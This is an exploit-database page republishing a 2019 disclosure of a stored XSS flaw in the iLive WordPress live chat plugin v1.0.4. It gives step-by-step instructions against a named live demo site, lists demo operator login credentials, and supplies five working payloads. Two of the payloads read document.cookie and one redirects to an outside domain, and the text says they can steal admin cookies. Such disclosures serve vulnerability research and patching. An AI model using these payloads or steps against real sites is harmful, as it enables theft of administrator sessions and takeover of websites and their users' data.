Advertisement






iLive - Intelligent WordPress Live Chat Support Plugin v1.0.4 Stored XSS Injection

CVE Category Price Severity
CVE-2021-24124 CWE-79 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2019-06-28
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019060166

Below is a copy:

iLive - Intelligent WordPress Live Chat Support Plugin v1.0.4 Stored XSS Injection
/*!
* ::- Title: iLive - Intelligent WordPress Live Chat Support Plugin v1.0.4 Stored XSS Injection
* ::- Author: m0ze
* ::- Date: 2019/06/25
* ::- Software: iLive - Intelligent WordPress Live Chat Support Plugin v1.0.4
*/
  
::- Details & Description -::
~ Weak security measures like bad input field data filtering has been discovered in the iLive - Intelligent WordPress Live Chat Support Plugin. Current version of this premium WordPress plugin is 1.0.4.

::- Demo Website -::
~ https://codecanyon.net/item/ilive-wordpress-live-chat-support-plugin/20496563
~ Frontend: http://www.ilive.wpapplab.com/
~ Backend: http://www.ilive.wpapplab.com/wp-admin/
~ Login / Password (operator1): operator1 / Operator_1
~ Login / Password (operator2): operator2 / Operator_2
~ Login / Password (operator3): operator3 / Operator_3

::- Special Note -::
~ -

::- Google Dork -::
~ -

::- PoC Links -::
~ -

::- PoC [Stored XSS Injection] -::
~ Go to the demo website http://www.ilive.wpapplab.com/ and open chat window by clicking on Chat icon on the bottom right corner. Use your payload inside input field and press [Enter]. Provided exaple payloads working on the admin area, so it's possible to steal admin cookies or force a redirect to any other website.
~ To check your XSS Injections log in http://www.ilive.wpapplab.com/wp-admin/ with provided credentials (operator1 / Operator_1, operator2 / Operator_2, operator3 / Operator_3) and go to this page http://www.ilive.wpapplab.com/wp-admin/admin.php?page=ilive-chat-page then select your chat alias from the list. Keep in mind that there is 3 demo operators, so you must log in as operator assigned to your chat (operator number will be available after you send the first message in chat).
~ Example #1: <img src=https://i.imgur.com/zRm8R9z.gif onload=alert(`m0ze`);>
~ Example #2: <img src=https://i.imgur.com/zRm8R9z.gif onload=alert(document.cookie);>
~ Example #3: <img src=x onerror=window.location.replace('https://m0ze.ru/');>
~ Example #4: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
~ Example #5: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum